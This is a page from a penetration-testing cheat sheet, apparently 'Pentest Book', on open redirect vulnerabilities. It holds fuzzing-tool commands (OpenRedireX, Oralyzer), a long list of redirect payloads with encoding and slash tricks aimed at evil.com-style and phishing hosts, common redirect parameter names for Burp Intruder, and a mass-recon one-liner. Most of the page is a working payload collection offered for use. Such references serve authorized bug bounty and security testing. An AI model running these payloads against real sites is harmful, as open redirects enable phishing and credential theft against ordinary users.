Pentest Book
Search…
Open redirects

Tools

1
#https://github.com/devanshbatham/OpenRedireX
2
python3 openredirex.py -u "https://website.com/?url=FUZZ" -p payloads.txt --keyword FUZZ
3
4
#https://github.com/0xNanda/Oralyzer
5
python3 oralyzer.py -u https://website.com/redir?url=
6
7
# Payload generator
8
# https://gist.github.com/zPrototype/b211ae91e2b082420c350c28b6674170
Copied!

Payloads

1
# Check for
2
=aHR0
3
=http
4
# https://github.com/m0chan/BugBounty/blob/master/OpenRedirectFuzzing.txt
5
6
https://web.com/r/?url=https://phising-malicious.com
7
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect
8
9
# Check redirects
10
https://url.com/redirect/?url=http://twitter.com/
12
http://www.yoursite.com/http://www.theirsite.com/
13
http://www.yoursite.com/folder/www.folder.com
14
/http://twitter.com/
15
/\\twitter.com
16
/\/twitter.com
17
?c=.twitter.com/
18
/?redir=google。com
19
//google%E3%80%82com
20
//google%00.com
21
/%09/google.com
22
/%5cgoogle.com
23
//www.google.com/%2f%2e%2e
24
//www.google.com/%2e%2e
25
//google.com/
26
//google.com/%2f..
27
//\google.com
28
/\victim.com:80%40google.com
29
https://target.com///google.com//
30
# Remember url enconde the payloads!
31
32
# Search in Burp:
33
=http” or “=aHR0”(base64 encode http)
34
35
# Fuzzing openredirect
36
37
# Intruder url open redirect
38
/{payload}
39
?next={payload}
40
?url={payload}
41
?target={payload}
42
?rurl={payload}
43
?dest={payload}
44
?destination={payload}
45
?redir={payload}
46
?redirect_uri={payload}
47
?redirect_url={payload}
48
?redirect={payload}
49
/redirect/{payload}
50
/cgi-bin/redirect.cgi?{payload}
51
/out/{payload}
52
/out?{payload}
53
?view={payload}
54
/login?to={payload}
55
?image_url={payload}
56
?go={payload}
57
?return={payload}
58
?returnTo={payload}
59
?return_to={payload}
60
?checkout_url={payload}
61
?continue={payload}
62
?return_path={payload}
63
64
# Valid URLs:
65
http(s)://evil.com
66
http(s):\\evil.com
67
//evil.com
68
///evil.com
69
/\evil.com
70
\/evil.com
71
/\/evil.com
72
\\evil.com
73
\/\evil.com
74
/ /evil.com
75
\ \evil.com
76
77
# Oneliner with gf
78
echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew
Copied!
Last modified 9mo ago
Export as PDF
Copy link